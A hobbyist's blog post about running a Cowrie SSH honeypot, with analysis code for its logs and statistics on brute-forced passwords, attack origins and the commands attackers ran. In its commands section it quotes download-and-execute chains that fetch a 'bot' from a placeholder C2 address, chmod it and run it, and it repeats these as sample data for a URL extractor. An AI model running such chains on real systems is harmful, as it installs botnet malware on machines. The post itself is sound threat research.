Adventures in Running a Honeypot
Posted 2024/08/18
I’ve been doing some malware research as a hobby for a while now because I find it interesting and useful for sharpening my reverse engineering skills. Malware researchers analyze malware samples to determine their unique features, objectives, and potential effects. I usually work on random infostealers that pop up on Discord or old malicious Microsoft Office documents (not all of which I have written about)[1]. Looking to get deeper into malware research, I decided to start a honeypot server to do a bit more threat hunting and collect newer malware samples to analyze.
What is a Honeypot
A honeypot is a piece of data or a device that appears to legitimately hold information or resources of value to a potential online attacker. The honeypot is actually isolated and monitored, and will log and analyze the activities of any attacker. Honeypot servers host services that appear vulnerable in order to bait attacks, which can then be analyzed to better understand their source and behaviour.
How did I set up my Honeypot
My honeypot server is an Ubuntu server VM running in an isolated cloud account. The server has its own public IPv4 address and runs the Cowrie SSH/Telnet honeypot software on the usual SSH port, TCP/22. Cowrie is intentionally set up to accept a variety of common usernames and passwords, and upon a successful login it will emulate a Debian 5.0 shell with a fake file system. Attackers can send commands to the shell, upload files with SFTP or SCP, or attempt SSH proxying. Any actions taken or credentials used will be logged. Cowrie will also save any malicious files uploaded to it or downloaded through attempted Wget or Curl commands for further analysis. My Cowrie installation is also set up to send its logs to Datadog to make activity on the honeypot searchable, and to take advantage of Datadog’s threat intelligence capabilities.
To make Cowrie more convincing as an SSH server, the actual SSH server that I use to manage the machine runs on a different port and is hidden behind port knocking. Port knocking uses the firewall to block access to the SSH server’s port unless a specific sequence of connection attempts is made first. This stops the real SSH server from showing up in port scans, making Cowrie’s role as the server’s legitimate SSH server more convincing.
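To make the port knocking idea concrete, here is a minimal Python sketch of the bookkeeping a knock daemon has to do. It is an illustration only and not how knockd is implemented; the `KnockTracker` name, the port sequence, and the time window are all hypothetical.

```python
import time


class KnockTracker:
    """Tracks each source IP's progress through a secret knock sequence."""

    def __init__(self, sequence, window_seconds=10.0):
        self.sequence = list(sequence)        # hypothetical ports, in order
        self.window_seconds = window_seconds  # max time to finish the sequence
        self._progress = {}                   # ip -> (next index, start time)

    def knock(self, ip, port, now=None):
        """Record a connection attempt; return True once the sequence completes."""
        now = time.monotonic() if now is None else now
        index, started = self._progress.get(ip, (0, now))
        if now - started > self.window_seconds:
            index, started = 0, now  # too slow: start over
        if port == self.sequence[index]:
            index += 1
        elif port == self.sequence[0]:
            index, started = 1, now  # wrong knock that is itself a valid first knock
        else:
            index, started = 0, now  # wrong knock: reset progress
        if index == len(self.sequence):
            self._progress.pop(ip, None)
            return True  # a real daemon would now open the firewall for this IP
        self._progress[ip] = (index, started)
        return False


tracker = KnockTracker([7000, 8000, 9000])
for port in (7000, 8000, 9000):
    opened = tracker.knock("203.0.113.5", port)
print("SSH port opened:", opened)
```

A real setup would react to a completed sequence by adding a short-lived firewall rule that lets that one IP reach the hidden SSH port.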
Random things that I learned from setting this all up:
- Some Ubuntu 24.04 images available on cloud providers won’t respect the port you select in /etc/ssh/sshd_config anymore; instead you have to edit the systemd ssh.socket configuration
- Remember to actually enable the knockd and SSH services to run on boot before you reboot the server 🤣 (I think SSH somehow got disabled during all my attempts at changing the port)
- Some cloud providers provide serial access to your machines to let you login using a TTY session in case you mess up your SSH!
- You can’t use serial access unless you set a password for your user account, which I usually don’t do because I use SSH keys
- Some cloud providers don’t like you using UFW for your firewall and instead want you to use IPTables manually?
With this setup, and knowing that attackers are constantly port scanning or spraying the entire IPv4 address space with attacks[2], all I had to do was wait for attackers to run brute force password attacks and then analyze the activity that followed. I also plan on adding the TANNER/SNARE web application honeypot created by the MushMush Foundation in the near future to collect information on web application attacks as well.
What have I found so far
I’ve been running the honeypot server for about a month and have collected ~150 malware samples so far! Attackers really are hard at work with cloud server instances or botnets dedicated to port scanning the internet and password spraying attacks.
Below is a histogram of activity on the Cowrie service. Note the spikes in activity that occur whenever big password bruteforce attacks are conducted.
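A histogram like this can also be rebuilt straight from Cowrie's JSON log. The sketch below is a rough approximation and not the Datadog query behind the graph. It assumes one JSON object per line with `eventid` and `timestamp` fields, as Cowrie's JSON output writes them; the function names and the sample events are hypothetical.

```python
import json
from collections import Counter


def hourly_activity(log_lines, event_prefix="cowrie.login."):
    """Count events whose eventid starts with event_prefix, bucketed by hour."""
    buckets = Counter()
    for line in log_lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip blank, truncated, or corrupt lines
        if not isinstance(event, dict):
            continue
        timestamp = event.get("timestamp", "")
        if not timestamp or not event.get("eventid", "").startswith(event_prefix):
            continue
        # Timestamps are ISO 8601, so the first 13 characters are "YYYY-MM-DDTHH".
        buckets[timestamp[:13]] += 1
    return buckets


def render(buckets, width=40):
    """Draw one text bar per hour, scaled to the busiest hour."""
    peak = max(buckets.values(), default=0)
    rows = []
    for hour in sorted(buckets):
        bar = "#" * max(1, round(buckets[hour] / peak * width))
        rows.append(f"{hour}  {bar} {buckets[hour]}")
    return "\n".join(rows)


# Made-up sample events, only to show the expected input shape.
sample = [
    '{"eventid": "cowrie.login.failed", "timestamp": "2024-08-01T10:05:00.000000Z"}',
    '{"eventid": "cowrie.login.success", "timestamp": "2024-08-01T10:45:00.000000Z"}',
    '{"eventid": "cowrie.command.input", "timestamp": "2024-08-01T10:46:00.000000Z"}',
    '{"eventid": "cowrie.login.failed", "timestamp": "2024-08-01T11:00:00.000000Z"}',
]
print(render(hourly_activity(sample)))
```

Passing an open log file instead of the sample list works the same way, since the function only iterates over lines.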
Usernames & Passwords
Unsurprisingly, some of the most used passwords in bruteforce attacks were variations of 123456, root, admin and password. Some passwords that surprised me in how frequently they were attempted were keywords related to cryptocurrencies[3], some common first names, or weird keyboard layout tricks like 1q2w3e4r (first two rows of QWERTY) or !QAZ@WSX (first two columns).
I tried to categorize the passwords used and got the following rough count:
I also found that not all passwords tested come from password dictionaries; bots will occasionally tailor passwords to the target, for example by incorporating the target IP or service name into the password.
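A rough categorization like this can be sketched in a few lines of Python. The categories, word lists, and matching order below are assumptions made for illustration, not the rules used to produce the counts in this post, and the sample passwords are made up apart from the ones quoted above.

```python
import re
from collections import Counter

# Hypothetical word lists; extend them to match what shows up in your own logs.
KEYBOARD_WALKS = ("1q2w3e", "qwerty", "1qaz2wsx", "!qaz@wsx", "asdfgh")
DEFAULT_WORDS = ("root", "admin", "password", "test", "guest")


def categorize(password, target_ip=None, service="ssh"):
    """Return a coarse category for one attempted password."""
    lowered = password.lower()
    if target_ip and (target_ip in password or target_ip.replace(".", "") in password):
        return "tailored: target IP"
    if service and service in lowered:
        return "tailored: service name"
    if any(walk in lowered for walk in KEYBOARD_WALKS):
        return "keyboard walk"
    if re.fullmatch(r"\d+", password):
        return "digits only"
    if any(word in lowered for word in DEFAULT_WORDS):
        return "default word"
    return "other"


def count_categories(passwords, target_ip=None):
    """Tally categories over an iterable of attempted passwords."""
    return Counter(categorize(p, target_ip) for p in passwords)


attempts = ["123456", "1q2w3e4r", "!QAZ@WSX", "Admin123", "ssh2024", "203.0.113.7!"]
for category, count in count_categories(attempts, target_ip="203.0.113.7").most_common():
    print(f"{count:3d}  {category}")
```

The order of the checks matters: the tailored categories are tested first so that a password containing both the target IP and a common word is counted as tailored.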
Geographic Origin
Analyzing the countries that attacks came from was pretty interesting. The United States, China, South Korea, and India showing up at the top makes sense considering their respective Internet of Things markets are the largest in the world, and IoT devices are some of the largest contributors to botnets like Mirai. Many botnets use these devices to conduct DDoS attacks and password bruteforce attacks. After these IoT market heavyweights, I expected the graph of top countries to roughly follow the size of each country’s IPv4 address allocation, but that does not seem to be the case.
Analyzing IPs by ASNs shows that not all attacks come from IoT devices. Many attacks do originate from consumer telecommunication networks like ASN4134 CHINANET-BACKBONE, ASN4766 Korea Telecom, and ASN7922 Comcast, which is representative of IoT attacks. However, many attacks seem to come from cloud providers like ASN396982 Google Cloud Platform, ASN14061 DigitalOcean, ASN8075 Microsoft, and ASN37963 Alibaba, which suggests that insecurely configured servers are being added to botnets or that attackers are setting up port scanners, bruteforcers, and command & control infrastructure on these providers.
SSH Client Versions
Clients that connect to SSH servers usually pass along information about their client version and supported encryption and hashing algorithms. Looking at SSH client versions, we can see that common client libraries used to create bruteforcers include the built-in Golang SSH module, Paramiko for Python, Makiko for Rust, and LibSSH. Many attackers also use regular clients like PuTTY or OpenSSH. It is interesting to see that OpenSSH will also provide information about the client’s Debian, Ubuntu, or Raspbian versions. Port scanners like Nmap, ZGrab2.0, and MGLNDD can also be seen.
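The client version arrives as the SSH identification string, which RFC 4253 defines as `SSH-protoversion-softwareversion`, optionally followed by a space and comments. The Python sketch below splits such a string into its parts. The `ClientBanner` and `parse_banner` names are hypothetical, splitting the software field on the first underscore is a heuristic rather than part of the RFC, and the example banners only illustrate the format; they are not copied from my logs.

```python
from typing import NamedTuple, Optional


class ClientBanner(NamedTuple):
    protocol: str   # e.g. "2.0"
    software: str   # e.g. "OpenSSH"
    version: str    # e.g. "8.9p1" (empty if the client sends none)
    comments: str   # e.g. distribution package info (may be empty)


def parse_banner(banner: str) -> Optional[ClientBanner]:
    """Parse an SSH identification string; return None if it is not one."""
    parts = banner.strip().split("-", 2)
    if len(parts) != 3 or parts[0] != "SSH":
        return None
    protocol, rest = parts[1], parts[2]
    software_version, _, comments = rest.partition(" ")
    # Heuristic: many clients write "name_version"; others send only a name.
    software, _, version = software_version.partition("_")
    return ClientBanner(protocol, software, version, comments)


for raw in ("SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "SSH-2.0-Go", "GET / HTTP/1.1"):
    print(repr(raw), "->", parse_banner(raw))
```

The comments field is where distribution details end up, which is why OpenSSH clients leak their Debian, Ubuntu, or Raspbian package versions.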
Commands & Payloads
Finally, moving on to what we set up the whole honeypot for: the attacks themselves!
After a successful login, a lot of the bruteforcers that attack the honeypot seem to just collect information about the system, presumably so the attacker can come back and investigate the server later. Common commands run for information gathering include the following:
Most other attacker commands involved downloading executables with Wget or Curl, running those executables, moving or deleting files, changing passwords, changing file permissions, or gaining persistence with Cron.
It was interesting to see that when downloading malicious files, attackers would try using Wget, Curl, and BusyBox Wget just in case the victim didn’t have them all installed. Some attackers would try installing Curl themselves before this step using the APT package manager. Some attackers also went the extra step of opening TCP sockets themselves to make HTTP requests if none of those utilities were available:
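To show what speaking HTTP by hand over a TCP socket involves, here is a minimal Python sketch. It illustrates the general idea only and is not a reconstruction of the attackers' commands; the function names, host, and path are hypothetical.

```python
import socket


def build_request(host: str, path: str) -> bytes:
    """Build a bare-bones HTTP/1.0 GET request as raw bytes."""
    request = f"GET {path} HTTP/1.0\r\nHost: {host}\r\nConnection: close\r\n\r\n"
    return request.encode("ascii")


def split_response(raw: bytes):
    """Split a raw HTTP response into its status line and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line = head.split(b"\r\n", 1)[0].decode("ascii", "replace")
    return status_line, body


def fetch(host: str, path: str, port: int = 80, timeout: float = 10.0):
    """Send the request over a plain TCP socket and read until the server closes."""
    with socket.create_connection((host, port), timeout=timeout) as conn:
        conn.sendall(build_request(host, path))
        chunks = []
        while True:
            chunk = conn.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return split_response(b"".join(chunks))


print(build_request("example.test", "/file"))
```

No HTTP client is needed on the machine: everything after the TCP connection is just text written to and read from the socket, which is why this fallback works on stripped-down systems.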
It was also interesting to see there were some rivalries among malware authors. Attackers would frequently try to kill other processes they suspected were other malware or harden firewall rules to block rival command & control servers (C2):
The attempts to block rival C2 servers actually led me to C2 servers that haven’t attacked my honeypot yet, whose HTTP or FTP servers were filled with additional samples I could download.
Below is a graph of the most commonly run commands that attackers use:
The majority of malicious programs were delivered to my honeypot through the execution of Wget or Curl commands to download from an HTTP server. These commands would be chained with commands to enable execution permissions and then execute the malicious program, like curl -s -O http://<C2_SERVER_IP>/bot && chmod 777 bot && ./bot. Sometimes these commands would download the malicious ELF or PE executable directly, and sometimes they would download a dropper script. These dropper scripts would contain URLs for executables compiled for many different CPU architectures, and the script would try downloading and running them all:
Some malicious programs were also uploaded to the honeypot using SFTP or SCP, with follow-up commands used to run the executable.
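For the download-and-run chains described above, the payload URLs can be pulled out of logged commands with a small Python sketch like the one below. It assumes the command text has already been read from the log (Cowrie records it in the `input` field of `cowrie.command.input` events). The regular expression is a deliberately simple heuristic, the function names are hypothetical, and the addresses are documentation-range placeholders.

```python
import re

# Heuristic: a URL runs until whitespace, a quote, or a shell metacharacter.
URL_PATTERN = re.compile(r"""(?:https?|ftp)://[^\s'"|;&<>]+""", re.IGNORECASE)


def extract_urls(command):
    """Return every URL found in one logged command line, in order."""
    return URL_PATTERN.findall(command)


def collect_urls(commands):
    """Return the unique URLs across many commands, keeping first-seen order."""
    seen = {}
    for command in commands:
        for url in extract_urls(command):
            seen.setdefault(url, None)
    return list(seen)


logged = [
    "curl -s -O http://203.0.113.9/bot && chmod 777 bot && ./bot",
    "cd /tmp; wget http://198.51.100.4/x.sh; curl -O 'http://198.51.100.4/x.sh'; sh x.sh",
]
for url in collect_urls(logged):
    print(url)
```

Deduplicating while keeping first-seen order makes it easier to tell which server a campaign tried first.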
The malicious files I have collected so far have been in many different file formats and compiled for many different CPU architectures:
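As a rough sketch of how samples can be sorted by format and architecture (an illustration, not the exact tooling behind the numbers in this post), the first few bytes of each file are enough. The Python below reads the ELF identification bytes and the `e_machine` field; the `identify` name is hypothetical and the machine table covers only a handful of well-known values.

```python
import struct

# A few e_machine values from the ELF specification; unknown ones are shown numerically.
ELF_MACHINES = {
    2: "SPARC", 3: "x86", 4: "m68k", 8: "MIPS", 20: "PowerPC",
    40: "ARM", 42: "SuperH", 62: "x86-64", 183: "AArch64",
}


def identify(data: bytes) -> str:
    """Classify a sample from its leading bytes."""
    if data[:4] == b"\x7fELF" and len(data) >= 20:
        bits = {1: "32-bit", 2: "64-bit"}.get(data[4], "unknown class")
        byte_order = {1: "<", 2: ">"}.get(data[5])  # EI_DATA: 1 = little, 2 = big
        if byte_order is None:
            return "ELF (unknown byte order)"
        # e_machine is a 16-bit field at offset 18, stored in the file's byte order.
        (machine,) = struct.unpack_from(byte_order + "H", data, 18)
        name = ELF_MACHINES.get(machine, f"machine {machine}")
        order = "little-endian" if byte_order == "<" else "big-endian"
        return f"ELF {bits} {order} {name}"
    if data[:2] == b"MZ":
        return "PE/DOS executable"
    if data[:2] == b"#!":
        return "script"
    return "unknown"


# Synthetic 20-byte header: 64-bit, little-endian, ET_EXEC, x86-64.
header = b"\x7fELF" + bytes([2, 1, 1, 0]) + bytes(8) + struct.pack("<HH", 2, 62)
print(identify(header))
```

To classify a real sample, read the first 20 bytes or so of the file in binary mode and pass them to `identify`.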
There are so many samples to sift through, but with this new material to analyze, expect to see a resumption of blog posts on malware reverse engineering in the future!
All Indicators of Compromise (malicious file hashes, URLs, domain names, and IP addresses) that I’m collecting from this honeypot project can be found in this VirusTotal collection.
[1] I did once intercept a Log4J exploit payload thrown at my website, which contained the January 2024 version of the RedTail cryptominer malware.
[2] It only actually takes like 5 minutes to scan the entire IPv4 address space using tools like masscan.
[3] Cryptocurrency is an abject disaster - Drew DeVault’s blog